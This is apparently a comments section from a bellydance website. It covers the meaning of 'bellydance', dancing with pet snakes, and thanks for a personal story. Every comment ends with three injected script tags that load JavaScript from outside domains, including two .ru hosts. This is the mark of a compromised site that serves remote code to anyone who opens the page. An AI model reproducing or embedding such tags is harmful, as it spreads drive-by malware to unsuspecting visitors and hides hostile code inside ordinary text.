Responding to your question/observation as a current editor of The Hip Circle — You are right, the article is not about “Middle Eastern Dance,” it is, however, about “bellydance” in the wider sense of this term, as an interpretative dance genre employed in the West by many artists and communities to express and convey meanings unrelated to the Middle Eastern/North African/Turkish/Central Asian etc. cultures where the bellydance vocabulary originated. I guess it’s just a matter of semantics, what meaning we ascribe to the term “bellydance.” After its over-100-year history in the West, it’s not surprising that we see so many genres that retain the parameters of the “bellydance” vocabulary, but have nothing to do with the lands of its origin in meaning, music or cultural use. Serpentessa teaches and performs bellydance as ritual and as therapy, it is both, an original and a popular approach, since many believe that the “bellydance” vocabulary can be traced to ritualistic dances predating the current cultures of the Middle/Near East/ North Africa, Turkey, etc.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

I cannot tell you how much sH*t I get from snake breeders that feel you should not dance with your snakes. I have a BP and a Corn that I dance with and they seem to enjoy it. BUT as soon as I have the slightest problem with them, they blame the dancing. Thank god for me being a licensed vet tech (my real life!)of 12 years and knowing some very cool reptile vets to tell me to keep my chin up and keeping my dance partners healthy :)<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

I liked your personal story very much, as I dance for the Goddess, too...Thank you for sharing your experience. It's really extraordinaire. )O( <script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>
